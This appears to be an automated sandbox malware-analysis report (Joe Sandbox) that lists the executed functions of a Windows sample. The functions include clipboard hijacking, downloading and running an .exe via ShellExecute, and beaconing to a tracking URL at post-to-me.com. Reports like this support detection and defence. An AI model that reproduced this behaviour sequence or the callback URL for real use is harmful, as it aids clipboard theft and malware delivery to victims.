32928->32949 32931 4341b9 32960 42a5bd 26 API calls _Deallocate 32931->32960 32932 4341d7 32956 4347f3 32932->32956 32935 4341c4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 32935->32922 32937 4342db 32939 4342e8 32937->32939 32943 43428e 32937->32943 32938 43425f 32941 43427c 32938->32941 32938->32943 32962 42eae9 20 API calls __dosmaperr 32939->32962 32961 4344bf 31 API calls 4 library calls 32941->32961 32943->32935 32963 43433b 30 API calls 2 library calls 32943->32963 32944 434286 32944->32935 32946->32919 32947->32924 32948->32924 32950 432934 32949->32950 32951 432949 32949->32951 32964 42eae9 20 API calls __dosmaperr 32950->32964 32951->32932 32953 432939 32965 42a5bd 26 API calls _Deallocate 32953->32965 32955 432944 32955->32932 32966 434670 32956->32966 32958 4341f3 32958->32935 32958->32937 32958->32938 32959->32931 32960->32935 32961->32944 32962->32935 32963->32935 32964->32953 32965->32955 32967 43467c __FrameHandler3::FrameUnwindToState 32966->32967 32968 434684 32967->32968 32973 43469c 32967->32973 33001 42ead6 20 API calls __dosmaperr 32968->33001 32970 434750 33006 42ead6 20 API calls __dosmaperr 32970->33006 32971 434689 33002 42eae9 20 API calls __dosmaperr 32971->33002 32973->32970 32976 4346d4 32973->32976 32975 434755 33007 42eae9 20 API calls __dosmaperr 32975->33007 32991 4396c4 EnterCriticalSection 32976->32991 32979 43475d 33008 42a5bd 26 API calls _Deallocate 32979->33008 32980 4346da 32982 434713 32980->32982 32983 4346fe 32980->32983 32992 434775 32982->32992 33003 42eae9 20 API calls __dosmaperr 32983->33003 32984 434691 __wsopen_s 32984->32958 32987 43470e 33005 434748 LeaveCriticalSection __wsopen_s 32987->33005 32988 434703 33004 42ead6 20 API calls __dosmaperr 32988->33004 32991->32980 33009 439941 32992->33009 32994 434787 32995 4347a0 SetFilePointerEx 32994->32995 32996 43478f 32994->32996 32998 434794 32995->32998 32999 4347b8 GetLastError 32995->32999 33022 42eae9 20 API calls __dosmaperr 32996->33022 32998->32987 33023 42eab3 20 API calls __dosmaperr 32999->33023 33001->32971 33002->32984 33003->32988 33004->32987 33005->32984 33006->32975 33007->32979 33008->32984 33010 439963 33009->33010 33011 43994e 33009->33011 33016 439988 33010->33016 33026 42ead6 20 API calls __dosmaperr 33010->33026 33024 42ead6 20 API calls __dosmaperr 33011->33024 33013 439953 33025 42eae9 20 API calls __dosmaperr 33013->33025 33016->32994 33017 439993 33027 42eae9 20 API calls __dosmaperr 33017->33027 33018 43995b 33018->32994 33020 43999b 33028 42a5bd 26 API calls _Deallocate 33020->33028 33022->32998 33023->32998 33024->33013 33025->33018 33026->33017 33027->33020 33028->33018 33029 4023ba 33030 402581 PostQuitMessage 33029->33030 33031 4023ce 33029->33031 33035 40257f 33030->33035 33032 4023d5 DefWindowProcW 33031->33032 33033 4023ec 33031->33033 33032->33035 33034 402a14 167 API calls 33033->33034 33033->33035 33034->33035 33036 40fc2b 33037 40fc37 __FrameHandler3::FrameUnwindToState 33036->33037 33065 410018 33037->33065 33039 40fd91 33086 4104f3 4 API calls 2 library calls 33039->33086 33041 40fc3e 33041->33039 33043 40fc68 33041->33043 33042 40fd98 33087 42ffe9 28 API calls _Atexit 33042->33087 33053 40fca7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 33043->33053 33080 42fd0e 5 API calls __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 33043->33080 33045 40fd9e 33088 42ff9b 28 API calls _Atexit 33045->33088 33048 40fc81 33050 40fc87 33048->33050 33081 42fcb2 5 API calls __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 33048->33081 33049 40fda6 33052 40fd08 33076 41060d 33052->33076 33053->33052 33082 42a386 167 API calls 4 library calls 33053->33082 33056 40fd0e 33057 40fd23 33056->33057 33083 410643 GetModuleHandleW 33057->33083 33059 40fd2a 33059->33042 33060 40fd2e 33059->33060 33061 40fd37 33060->33061 33084 42ff8c 28 API calls _Atexit 33060->33084 33085 4101a7 13 API calls 2 library calls 33061->33085 33064 40fd3f 33064->33050 33066 410021 33065->33066 33089 41079b IsProcessorFeaturePresent 33066->33089 33068 41002d 33090 428847 10 API calls 3 library calls 33068->33090 33070 410032 33071 410036 33070->33071 33091 4317c1 33070->33091 33071->33041 33074 41004d 33074->33041 33099 426850 33076->33099 33079 410633 33079->33056 33080->33048 33081->33053 33082->33052 33083->33059 33084->33061 33085->33064 33086->33042 33087->33045 33088->33049 33089->33068 33090->33070 33095 43bbfc 33091->33095 33094 428870 8 API calls 3 library calls 33094->33071 33096 43bc15 33095->33096 33097 40f8f4 __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33096->33097 33098 41003f 33097->33098 33098->33074 33098->33094 33100 410620 GetStartupInfoW 33099->33100 33100->33079 33101 402bcd RegCreateKeyExW 33102 402bfb RegSetValueExW 33101->33102 33103 402c0f 33101->33103 33102->33103 33104 402c14 RegCloseKey 33103->33104 33105 402c1d 33103->33105 33104->33105 33106 4332fe 33107 43330b 33106->33107 33111 433323 33106->33111 33156 42eae9 20 API calls __dosmaperr 33107->33156 33109 433310 33157 42a5bd 26 API calls _Deallocate 33109->33157 33114 43337e 33111->33114 33120 43331b 33111->33120 33158 434ced 21 API calls 2 library calls 33111->33158 33112 432928 __fread_nolock 26 API calls 33115 433396 33112->33115 33114->33112 33126 432e36 33115->33126 33117 43339d 33118 432928 __fread_nolock 26 API calls 33117->33118 33117->33120 33119 4333c9 33118->33119 33119->33120 33121 432928 __fread_nolock 26 API calls 33119->33121 33122 4333d7 33121->33122 33122->33120 33123 432928 __fread_nolock 26 API calls 33122->33123 33124 4333e7 33123->33124 33125 432928 __fread_nolock 26 API calls 33124->33125 33125->33120 33127 432e42 __FrameHandler3::FrameUnwindToState 33126->33127 33128 432e62 33127->33128 33129 432e4a 33127->33129 33131 432f28 33128->33131 33134 432e9b 33128->33134 33225 42ead6 20 API calls __dosmaperr 33129->33225 33232 42ead6 20 API calls __dosmaperr 33131->33232 33133 432e4f 33226 42eae9 20 API calls __dosmaperr 33133->33226 33137 432eaa 33134->33137 33138 432ebf 33134->33138 33135 432f2d 33233 42eae9 20 API calls __dosmaperr 33135->33233 33227 42ead6 20 API calls __dosmaperr 33137->33227 33159 4396c4 EnterCriticalSection 33138->33159 33142 432eaf 33228 42eae9 20 API calls __dosmaperr 33142->33228 33143 432ec5 33147 432ee1 33143->33147 33148 432ef6 33143->33148 33144 432eb7 33234 42a5bd 26 API calls _Deallocate 33144->33234 33145 432e57 __wsopen_s 33145->33117 33229 42eae9 20 API calls __dosmaperr 33147->33229 33160 432f49 33148->33160 33152 432ef1 33231 432f20 LeaveCriticalSection __wsopen_s 33152->33231 33153 432ee6 33230 42ead6 20 API calls __dosmaperr 33153->33230 33156->33109 33157->33120 33158->33114 33159->33143 33161 432f73 33160->33161 33162 432f5b 33160->33162 33164 4332dd 33161->33164 33169 432fb8 33161->33169 33244 42ead6 20 API calls __dosmaperr 33162->33244 33262 42ead6 20 API calls __dosmaperr 33164->33262 33165 432f60 33245 42eae9 20 API calls __dosmaperr 33165->33245 33168 4332e2 33263 42eae9 20 API calls __dosmaperr 33168->33263 33170 432f68 33169->33170 33172 432fc3 33169->33172 33176 432ff3 33169->33176 33170->33152 33246 42ead6 20 API calls __dosmaperr 33172->33246 33173 432fd0 33264 42a5bd 26 API calls _Deallocate 33173->33264 33175 432fc8 33247 42eae9 20 API calls __dosmaperr 33175->33247 33179 43300c 33176->33179 33180 433032 33176->33180 33181 43304e 33176->33181 33179->33180 33215 433019 33179->33215 33248 42ead6 20 API calls __dosmaperr 33180->33248 33251 4336c7 21 API calls 3 library calls 33181->33251 33184 433037 33249 42eae9 20 API calls __dosmaperr 33184->33249 33185 433065 33188 43348a _free 20 API calls 33185->33188 33191 43306e 33188->33191 33189 4331b7 33192 43322d 33189->33192 33196 4331d0 GetConsoleMode 33189->33196 33190 43303e 33250 42a5bd 26 API calls _Deallocate 33190->33250 33194 43348a _free 20 API calls 33191->33194 33195 433231 ReadFile 33192->33195 33197 433075 33194->33197 33198 4332a5 GetLastError 33195->33198 33199 43324b 33195->33199 33196->33192 33200 4331e1 33196->33200 33202 43309a 33197->33202 33203 43307f 33197->33203 33204 4332b2 33198->33204 33205 433209 33198->33205 33199->33198 33206 433222 33199->33206 33200->33195 33201 4331e7 ReadConsoleW 33200->33201 33201->33206 33207 433203 GetLastError 33201->33207 33254 43480e 33202->33254 33252 42eae9 20 API calls __dosmaperr 33203->33252 33260 42eae9 20 API calls __dosmaperr 33204->33260 33221 433049 __fread_nolock 33205->33221 33257 42eab3 20 API calls __dosmaperr 33205->33257 33216 433270 33206->33216 33217 433287 33206->33217 33206->33221 33207->33205 33208 43348a _free 20 API calls 33208->33170 33213 433084 33253 42ead6 20 API calls __dosmaperr 33213->33253 33214 4332b7 33261 42ead6 20 API calls __dosmaperr 33214->33261 33235 43d385 33215->33235 33258 432c65 31 API calls 2 library calls 33216->33258 33217->33221 33222 43329e 33217->33222 33221->33208 33259 432aa5 29 API calls __fread_nolock 33222->33259 33224 4332a3 33224->33221 33225->33133 33226->33145 33227->33142 33228->33144 33229->33153 33230->33152 33231->33145 33232->33135 33233->33144 33234->33145 33236 43d392 33235->33236 33237 43d39f 33235->33237 33265 42eae9 20 API calls __dosmaperr 33236->33265 33240 43d3ab 33237->33240 33266 42eae9 20 API calls __dosmaperr 33237->33266 33239 43d397 33239->33189 33240->33189 33242 43d3cc 33267 42a5bd 26 API calls _Deallocate 33242->33267 33244->33165 33245->33170 33246->33175 33247->33173 33248->33184 33249->33190 33250->33221 33251->33185 33252->33213 33253->33221 33255 434775 __fread_nolock 28 API calls 33254->33255 33256 434824 33255->33256 33256->33215 33257->33221 33258->33221 33259->33224 33260->33214 33261->33221 33262->33168 33263->33173 33264->33170 33265->33239 33266->33242 33267->33239

                                                        Executed Functions

                                                        Function 004016E3 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150clipboardsleepmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 004016EA
                                                        • Sleep.KERNEL32(000011EB,0000004C), ref: 004016F4
                                                          • Part of subcall function 0040CC35: _strlen.LIBCMT ref: 0040CC4C
                                                        • OpenClipboard.USER32(00000000), ref: 00401721
                                                        • GetClipboardData.USER32(00000001), ref: 00401731
                                                        • GlobalLock.KERNEL32(00000000), ref: 00401740
                                                        • _strlen.LIBCMT ref: 0040174D
                                                        • _strlen.LIBCMT ref: 0040177C
                                                        • _strlen.LIBCMT ref: 004018C0
                                                        • EmptyClipboard.USER32 ref: 004018D6
                                                        • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
                                                        • GlobalLock.KERNEL32(00000000), ref: 00401901
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040190D
                                                        • SetClipboardData.USER32(00000001,00000000), ref: 00401916
                                                        • GlobalFree.KERNEL32(00000000), ref: 0040191D
                                                        • CloseClipboard.USER32 ref: 00401941
                                                        • Sleep.KERNEL32(000002C7), ref: 0040194C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                        • String ID: i
                                                        • API String ID: 1583243082-3865851505
                                                        • Opcode ID: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                        • Instruction ID: e8206cc808b01b97a457829c5c6b97d93370119956ebdbcfeaa79ca2656f34e0
                                                        • Opcode Fuzzy Hash: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                        • Instruction Fuzzy Hash: EE51E431D00344DBE3119BA4ED46BAD7774FF2A306F04523AE805B62B2EB789A85C75D
                                                        Function 00402A14 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134networkfilesynchronizationCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A37
                                                        • InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 00402A4D
                                                        • GetTempPathW.KERNEL32(00000105,?), ref: 00402A69
                                                        • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A7F
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402AB8
                                                        • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AF4
                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402B11
                                                        • CloseHandle.KERNEL32(00000000), ref: 00402B27
                                                        • ShellExecuteExW.SHELL32(?), ref: 00402B88
                                                        • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B9D
                                                        • CloseHandle.KERNEL32(?), ref: 00402BA9
                                                        • InternetCloseHandle.WININET(00000000), ref: 00402BB2
                                                        • InternetCloseHandle.WININET(00000000), ref: 00402BB5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                        • String ID: .exe$<$ShareScreen
                                                        • API String ID: 3323492106-493228180
                                                        • Opcode ID: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                        • Instruction ID: d8cef6b8be2db64f00d3760719452557403e9faa7f5bbaccd6a49820079d0072
                                                        • Opcode Fuzzy Hash: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                        • Instruction Fuzzy Hash: 3E41537190021CAEEB20DF50DD85FEAB7BCFF05745F0080FAA545A2190DEB49E858FA4
                                                        Function 00432F49 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 74 432f49-432f59 75 432f73-432f75 74->75 76 432f5b-432f6e call 42ead6 call 42eae9 74->76 78 432f7b-432f81 75->78 79 4332dd-4332ea call 42ead6 call 42eae9 75->79 92 4332f5 76->92 78->79 82 432f87-432fb2 78->82 97 4332f0 call 42a5bd 79->97 82->79 85 432fb8-432fc1 82->85 88 432fc3-432fd6 call 42ead6 call 42eae9 85->88 89 432fdb-432fdd 85->89 88->97 90 432fe3-432fe7 89->90 91 4332d9-4332db 89->91 90->91 95 432fed-432ff1 90->95 96 4332f8-4332fd 91->96 92->96 95->88 99 432ff3-43300a 95->99 97->92 102 433027-433030 99->102 103 43300c-43300f 99->103 107 433032-433049 call 42ead6 call 42eae9 call 42a5bd 102->107 108 43304e-433058 102->108 105 433011-433017 103->105 106 433019-433022 103->106 105->106 105->107 111 4330c3-4330dd 106->111 140 433210 107->140 109 43305a-43305c 108->109 110 43305f-43307d call 4336c7 call 43348a * 2 108->110 109->110 144 43309a-4330c0 call 43480e 110->144 145 43307f-433095 call 42eae9 call 42ead6 110->145 113 4330e3-4330f3 111->113 114 4331b1-4331ba call 43d385 111->114 113->114 117 4330f9-4330fb 113->117 127 43322d 114->127 128 4331bc-4331ce 114->128 117->114 121 433101-433127 117->121 121->114 125 43312d-433140 121->125 125->114 130 433142-433144 125->130 132 433231-433249 ReadFile 127->132 128->127 133 4331d0-4331df GetConsoleMode 128->133 130->114 135 433146-433171 130->135 137 4332a5-4332b0 GetLastError 132->137 138 43324b-433251 132->138 133->127 139 4331e1-4331e5 133->139 135->114 143 433173-433186 135->143 146 4332b2-4332c4 call 42eae9 call 42ead6 137->146 147 4332c9-4332cc 137->147 138->137 148 433253 138->148 139->132 141 4331e7-433201 ReadConsoleW 139->141 142 433213-43321d call 43348a 140->142 149 433203 GetLastError 141->149 150 433222-43322b 141->150 142->96 143->114 154 433188-43318a 143->154 144->111 145->140 146->140 151 4332d2-4332d4 147->151 152 433209-43320f call 42eab3 147->152 158 433256-433268 148->158 149->152 150->158 151->142 152->140 154->114 161 43318c-4331ac 154->161 158->142 165 43326a-43326e 158->165 161->114 166 433270-433280 call 432c65 165->166 167 433287-433292 165->167 179 433283-433285 166->179 173 433294 call 432db5 167->173 174 43329e-4332a3 call 432aa5 167->174 180 433299-43329c 173->180 174->180 179->142 180->179
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                        • Instruction ID: d6ce50a492f9084338ba33edda2eca6d731db0489828e8dd55d9f9b17e416b32
                                                        • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                        • Instruction Fuzzy Hash: 6EC11370E04245AFDB11DFA9D841BAFBBB0BF0D305F08119AE815A7392C3789A41CB69
                                                        Function 0043D05C Relevance: 13.8, APIs: 9, Instructions: 272COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 182 43d05c-43d08c call 43cdbf 185 43d0a7-43d0b3 call 43979e 182->185 186 43d08e-43d099 call 42ead6 182->186 192 43d0b5-43d0ca call 42ead6 call 42eae9 185->192 193 43d0cc-43d115 call 43cd2a 185->193 191 43d09b-43d0a2 call 42eae9 186->191 202 43d37e-43d384 191->202 192->191 200 43d182-43d18b GetFileType 193->200 201 43d117-43d120 193->201 206 43d1d4-43d1d7 200->206 207 43d18d-43d1be GetLastError call 42eab3 CloseHandle 200->207 204 43d122-43d126 201->204 205 43d157-43d17d GetLastError call 42eab3 201->205 204->205 211 43d128-43d155 call 43cd2a 204->211 205->191 209 43d1e0-43d1e6 206->209 210 43d1d9-43d1de 206->210 207->191 221 43d1c4-43d1cf call 42eae9 207->221 214 43d1ea-43d238 call 4396e7 209->214 215 43d1e8 209->215 210->214 211->200 211->205 225 43d23a-43d246 call 43cf3b 214->225 226 43d248-43d26c call 43cadd 214->226 215->214 221->191 225->226 231 43d270-43d27a call 4335ed 225->231 232 43d27f-43d2c2 226->232 233 43d26e 226->233 231->202 235 43d2e3-43d2f1 232->235 236 43d2c4-43d2c8 232->236 233->231 239 43d2f7-43d2fb 235->239 240 43d37c 235->240 236->235 238 43d2ca-43d2de 236->238 238->235 239->240 241 43d2fd-43d330 CloseHandle call 43cd2a 239->241 240->202 244 43d332-43d35e GetLastError call 42eab3 call 4398b0 241->244 245 43d364-43d378 241->245 244->245 245->240
                                                        APIs
                                                          • Part of subcall function 0043CD2A: CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                        • GetLastError.KERNEL32 ref: 0043D170
                                                        • __dosmaperr.LIBCMT ref: 0043D177
                                                        • GetFileType.KERNEL32(00000000), ref: 0043D183
                                                        • GetLastError.KERNEL32 ref: 0043D18D
                                                        • __dosmaperr.LIBCMT ref: 0043D196
                                                        • CloseHandle.KERNEL32(00000000), ref: 0043D1B6
                                                        • CloseHandle.KERNEL32(?), ref: 0043D300
                                                        • GetLastError.KERNEL32 ref: 0043D332
                                                        • __dosmaperr.LIBCMT ref: 0043D339
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                        • String ID:
                                                        • API String ID: 4237864984-0
                                                        • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                        • Instruction ID: 006e68bf3f1d2291baca7e3f3ccd15ce7d6f583b40adfd1c0386b5d8b5644812
                                                        • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                        • Instruction Fuzzy Hash: 70A13632E101049FDF19AF68EC917AE7BA0AF0A324F14115EF805AB3D1D7389D12CB5A
                                                        Function 00402C24 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 185networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C47
                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E5F
                                                        • InternetCloseHandle.WININET(00000000), ref: 00402E70
                                                        • InternetCloseHandle.WININET(00000000), ref: 00402E73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseHandleOpen_wcslen
                                                        • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                        • API String ID: 3067768807-1501832161
                                                        • Opcode ID: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                        • Instruction ID: 48789f1b3701ba946f3e6b41f8bd096f2728906552624118b4e60daa7bc135c0
                                                        • Opcode Fuzzy Hash: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                        • Instruction Fuzzy Hash: 89516095A65344A8E320EFB0BC52F363378EF58712F10643BE518CB2B2E3B59944875E
                                                        Function 004051F5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                        • String ID: %X@
                                                        • API String ID: 1687354797-3313093589
                                                        • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                        • Instruction ID: b3e9ac138a89c9aab4b32a44e65933d882eee500b320c13cfd578e42c41f9d09
                                                        • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                        • Instruction Fuzzy Hash: 3D214172C042499ADF15EBE9D881BDEB7F8AF08318F14407FE504B72C1DB7D99488A69
                                                        Function 00431F7E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 309 431f7e-431f95 GetLastError 310 431fa3-431faa call 434d4a 309->310 311 431f97-431fa1 call 435131 309->311 315 431faf-431fb5 310->315 311->310 316 431ff4-431ffb SetLastError 311->316 317 431fc0-431fce call 435187 315->317 318 431fb7 315->318 320 431ffd-432002 316->320 324 431fd3-431fe9 call 431d6c call 43348a 317->324 325 431fd0-431fd1 317->325 321 431fb8-431fbe call 43348a 318->321 328 431feb-431ff2 SetLastError 321->328 324->316 324->328 325->321 328->320
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                        • _free.LIBCMT ref: 00431FB8
                                                        • _free.LIBCMT ref: 00431FDF
                                                        • SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                        • SetLastError.KERNEL32(00000000), ref: 00431FF5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID: ('z
                                                        • API String ID: 3170660625-2735399949
                                                        • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                        • Instruction ID: 1e3cd072d0496c43a3242b2b2daca3b64790c0c87830b362050c04c7c8c4abe4
                                                        • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                        • Instruction Fuzzy Hash: 2101F936149A007BD61227255C45D6B262DABD977AF20212FF815933E2EFAD8906412D
                                                        Function 0042DFE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                        • ExitThread.KERNEL32 ref: 0042DFFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorExitLastThread
                                                        • String ID: 11@$f(@
                                                        • API String ID: 1611280651-1277599000
                                                        • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                        • Instruction ID: 8ccfe30e394ff3a7da82f1aad20c2a43f0afb1cc8a6867a0b2db1ae1affa3120
                                                        • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                        • Instruction Fuzzy Hash: 5BF0C874600624AFDB04AFB1D80ABAD3B70FF49715F10056EF4055B392CB796955CB68
                                                        Function 00405825 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • std::_Cnd_initX.LIBCPMT ref: 00405841
                                                        • __Cnd_signal.LIBCPMT ref: 0040584D
                                                        • std::_Cnd_initX.LIBCPMT ref: 00405862
                                                        • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405869
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                        • String ID:
                                                        • API String ID: 2059591211-0
                                                        • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                        • Instruction ID: d72f8bc51fec51febc5e3899202a3526e07d3a061d0a8301a91111c4e624332c
                                                        • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                        • Instruction Fuzzy Hash: 20F0A7714007009BE7317762C817B0A77A0AF0031DF10883FF15A769E2CF7DA8544A5D
                                                        Function 00402980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 374 402980-4029eb call 426850 call 42a36b call 42b474 call 402843 383 4029f9-402a13 call 404358 call 40f8f4 374->383 384 4029ed-4029f0 374->384 384->383 386 4029f2-4029f6 384->386 386->383 387 4029f8 386->387 387->383
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 004029AF
                                                        • __fassign.LIBCMT ref: 004029BF
                                                          • Part of subcall function 00402843: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                        • String ID: 4+@
                                                        • API String ID: 2843524283-3700369575
